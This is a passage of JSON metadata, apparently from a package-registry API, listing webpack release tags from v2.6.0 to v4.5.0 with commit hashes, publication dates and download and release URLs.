1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2F